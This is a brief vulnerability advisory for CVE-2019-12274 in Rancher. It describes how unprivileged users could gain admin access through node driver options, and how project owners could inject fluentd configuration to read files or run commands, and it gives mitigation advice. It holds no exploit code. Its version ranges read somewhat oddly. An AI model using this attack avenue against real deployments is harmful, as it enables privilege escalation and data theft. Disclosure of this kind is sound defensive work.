CVE-2019-12274

Name of the Vulnerable Software and Affected Versions Rancher versions 1 through 2.2.3 Rancher versions 2 through 2.2.3

Description The issue allows unprivileged users to gain admin access to the Rancher management plane by posting sensitive data to the cloud. This can be achieved by exploiting node driver options that permit posting certain files. Additionally, project owners can inject extra fluentd configuration to read files or execute arbitrary commands inside the fluentd container.

Recommendations For Rancher versions 1 through 2.2.3, consider restricting access to node deployment features for unprivileged users until a patch is available. For Rancher versions 2 through 2.2.3, restrict project owners' ability to inject additional fluentd configuration to prevent code injection and arbitrary command execution. At the moment, there is no information about a newer version that contains a fix for this vulnerability.